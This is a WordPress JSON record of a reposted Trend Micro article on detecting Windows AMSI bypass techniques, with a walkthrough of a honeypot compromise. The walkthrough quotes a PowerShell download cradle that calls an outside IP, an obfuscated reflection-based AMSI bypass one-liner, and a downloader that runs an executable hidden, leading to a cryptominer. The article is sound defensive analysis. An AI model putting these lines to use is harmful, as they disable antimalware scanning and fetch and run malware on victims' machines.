{"id":49830,"date":"2022-12-21T00:00:00","date_gmt":"2022-12-21T00:00:00","guid":{"rendered":"urn:uuid:428d8e17-4917-393c-babe-bab969d62e3a"},"modified":"2022-12-21T00:00:00","modified_gmt":"2022-12-21T00:00:00","slug":"detecting-windows-amsi-bypass-techniques","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/","title":{"rendered":"Detecting Windows AMSI Bypass Techniques"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/cover-detecting-amsi-bypass-techniques-trend-micro-vision-one-apex-one.jpg\"><\/p>\n<div><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/cover-detecting-amsi-bypass-techniques-trend-micro-vision-one-apex-one.jpg\" class=\"ff-og-image-inserted\"><\/div>\n<p>Techniques bypassing AMSI were primarily used by security researchers and penetration testers. In recent years, however, <a href=\"https:\/\/twitter.com\/trendmicrorsrch\/status\/959426180851134466\">cybercriminals<\/a> <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/e\/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html\">have<\/a> <a href=\"https:\/\/news.sophos.com\/en-us\/2021\/02\/02\/agent-tesla-amps-up-information-stealing-attacks\/\">abused<\/a> <a href=\"https:\/\/www.trendmicro.com\/vinfo\/gb\/threat-encyclopedia\/malware\/Trojan.PS1.POWTRAN.B\/\">this<\/a> and included the method as a feature in malware routines to evade detection that allowed them to continuously operate in a victim&#8217;s computer. Prior to AMSI, detections of fileless threats proved difficult. Previously documented methods used to achieve an AMSI bypass were:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Obfuscation and\/or encryption<\/span><\/li>\n<li><span class=\"rte-red-bullet\">PowerShell downgrade<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Hooks and unhooks<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Memory patching<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Forcing an error<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Registry modifications<\/span><\/li>\n<li><span class=\"rte-red-bullet\">DLL hijacking<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Reflection<\/span><\/li>\n<\/ul>\n<p>The whole topic of bypassing AMSI is complex, but the goal is to break the AMSI \u201cchain\u201d at some point. The AMSI chain\u2019s basic blocks is primarily composed of three components: The data provider, <i>amsi.dll<\/i>, and the AMSI provider. Based on the list of methods for bypassing AMSI, we can see the difficulty of detection can vary and will depend on the capabilities available in a machine.<\/p>\n<p><span class=\"main-subtitle-black\">Manually finding an AMSI bypass<\/span><\/p>\n<p>Analysts can look for processes bypassing AMSI in and via the following areas:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Registry<\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\<br \/>*\\Microsoft\\Windows Script\\Settings\\AmsiEnable<br \/>COM Hijacking<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<ul>\n<li><span class=\"rte-red-bullet\">Code execution (such as patterns, file names, and fuction names, among others)<\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">PowerShell 2.0<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">AmsiInitialize + VirtualProtect<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">GetProcAddress + VirtualProtect<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">LoadLibrary + any AMSI or related DLL<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span class=\"rte-red-bullet\">Memory<\/span><\/li>\n<li><span class=\"rte-red-bullet\">AMSI and related DLLs (DLL hijacking via <i>amsi.dll<\/i>)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Various hooks<\/span><\/li>\n<\/ul>\n<p><span class=\"main-subtitle-black\">AMSI bypass in real attacks<\/span><\/p>\n<p>Observing AMSI bypass in real attacks, we also found them as payloads, process injections, and miner configurations that can vary based on the time of deployment and targets. The following is an example of how it was used for a compromise from one of our cloud honeypots:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><\/span>After the initial access, a PowerShell script is executed<\/li>\n<\/ul>\n<p><span class=\"blockquote\">powershell&nbsp;&#8220;IEX(New-Object Net.WebClient).DownloadString(&#8216;<a href=\"http:\/\/89.34.27.167\/lol.ps1')\">hxxp:\/\/89.34.27.167\/lol.ps1&#8242;)<\/a>&#8220;<\/span><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><\/span>AMSI bypass<\/li>\n<\/ul>\n<p><span class=\"blockquote\">[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType((&#8220;{5}{2}{0}{1}{3}{6}{4}&#8221; -f &#8216;ut&#8217;,(&#8216;oma&#8217;+&#8217;t&#8217;+&#8217;ion.&#8217;),&#8217;.A&#8217;,(&#8216;Ams&#8217;+&#8217;iUt&#8217;),&#8217;ls&#8217;,(&#8216;S&#8217;+&#8217;ystem.&#8217;+&#8217;Manage&#8217;+&#8217;men&#8217;+&#8217;t&#8217;),&#8217;i&#8217;)).GetField((&#8220;{1}{2}{0}&#8221; -f (&#8216;Co&#8217;+&#8217;n&#8217;+&#8217;text&#8217;),(&#8216;am&#8217;+&#8217;s&#8217;),&#8217;i&#8217;),[Reflection.BindingFlags](&#8220;{4}{2}{3}{0}{1}&#8221; -f(&#8216;b&#8217;+&#8217;lic,Sta&#8217;+&#8217;ti&#8217;),&#8217;c&#8217;,&#8217;P&#8217;,&#8217;u&#8217;,(&#8216;N&#8217;+&#8217;on&#8217;))).GetValue($null),0x41414141)<\/span><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><\/span>Downloader execution based on system architecture<\/li>\n<\/ul>\n<p><span class=\"blockquote\">$cc = &#8220;http[:]\/\/89.34.27.167&#8221;<br \/>$is64 = (([Array](Get-WmiObject -Query &#8220;select AddressWidth from Win32_Processor&#8221;))[0].AddressWidth -eq 64)<br \/>$dst=&#8221;$env:TMP\\networkservicess.exe&#8221;<br \/>(New-Object Net.WebClient).DownloadFile(&#8220;$cc\/ps1-6.exe&#8221;, &#8220;$dst&#8221;)<br \/>Start-Process &#8220;$dst&#8221;&nbsp; -windowstyle hidden<\/span><br \/><i><\/i><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><\/span>Additional payloads are loaded into memory using <i>ps1-6[.]exe<\/i>.<\/li>\n<li><span class=\"rte-red-bullet\">The process\u2019 payloads transform into injectors that perform process hollowing on the&nbsp; <i>InstallUtil.exe<\/i> process.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">This ends with a complete payload download of an XMRig cryptocurrency miner deployment and setup.<\/span><\/li>\n<\/ul>\n<p><span class=\"main-subtitle-black\">Detecting AMSI bypass using Trend Micro Vision One\u2122<\/span><\/p>\n<p>We looked at some of the implementations of AMSI bypass and the visibility enabled by <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response.html\" target=\"_blank\" rel=\"noopener\">Trend Micro Vision One\u2122<\/a>, <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/hybrid-cloud\/cloud-one-workload-security.html\" target=\"_blank\" rel=\"noopener\">Trend Micro Cloud One\u2122- Workload Security<\/a>, and <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/user-protection\/sps\/endpoint.html\" target=\"_blank\" rel=\"noopener\">Trend Micro Apex One\u2122<\/a> to mitigate the risks brought on by the known and unknown methods to circumvent this security feature. Using the indicators and attributes of attempts logged from workloads and endpoints, these solutions and platforms allow security teams and analysts a wider view of attack attempts for immediate and actionable response.<\/p>\n<p>As a tool used to accompany other components and processes, the Observed Attack Techniques (OATs) for select AMSI bypasses determine the occurrences as suspicious and warranting investigation. The OAT results for bypasses are categorized as \u201cHigh Severity\u201d and immediately checks the endpoint for related components and events as part of evidence for analysis.<\/p>\n<p> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/l\/detecting-windows-amsi-bypass-techniques.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>We look into some of the implementations that cybercriminals use to bypass the Windows Antimalware Scan Interface (AMSI) and how security teams can detect threats attempting to abuse it for compromise with Trend Micro Vision One\u2122. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":49831,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9521,9511,9508,9555,9513],"class_list":["post-49830","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cyber-crime","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-endpoints","tag-trend-micro-research-exploitsvulnerabilities","tag-trend-micro-research-malware"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Detecting Windows AMSI Bypass Techniques 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Detecting Windows AMSI Bypass Techniques 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2022-12-21T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/cover-detecting-amsi-bypass-techniques-trend-micro-vision-one-apex-one.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Detecting Windows AMSI Bypass Techniques\",\"datePublished\":\"2022-12-21T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/\"},\"wordCount\":562,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/12\\\/detecting-windows-amsi-bypass-techniques.jpg\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cyber Crime\",\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Exploits&amp;Vulnerabilities\",\"Trend Micro Research : Malware\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/\",\"name\":\"Detecting Windows AMSI Bypass Techniques 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/12\\\/detecting-windows-amsi-bypass-techniques.jpg\",\"datePublished\":\"2022-12-21T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/12\\\/detecting-windows-amsi-bypass-techniques.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/12\\\/detecting-windows-amsi-bypass-techniques.jpg\",\"width\":641,\"height\":350},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/detecting-windows-amsi-bypass-techniques\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Detecting Windows AMSI Bypass Techniques\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Detecting Windows AMSI Bypass Techniques 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/","og_locale":"en_US","og_type":"article","og_title":"Detecting Windows AMSI Bypass Techniques 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2022-12-21T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/cover-detecting-amsi-bypass-techniques-trend-micro-vision-one-apex-one.jpg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Detecting Windows AMSI Bypass Techniques","datePublished":"2022-12-21T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/"},"wordCount":562,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/12\/detecting-windows-amsi-bypass-techniques.jpg","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cyber Crime","Trend Micro Research : Cyber Threats","Trend Micro Research : Endpoints","Trend Micro Research : Exploits&amp;Vulnerabilities","Trend Micro Research : Malware"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/","url":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/","name":"Detecting Windows AMSI Bypass Techniques 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/12\/detecting-windows-amsi-bypass-techniques.jpg","datePublished":"2022-12-21T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/12\/detecting-windows-amsi-bypass-techniques.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/12\/detecting-windows-amsi-bypass-techniques.jpg","width":641,"height":350},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/detecting-windows-amsi-bypass-techniques\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Detecting Windows AMSI Bypass Techniques"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/49830","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=49830"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/49830\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/49831"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=49830"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=49830"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=49830"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}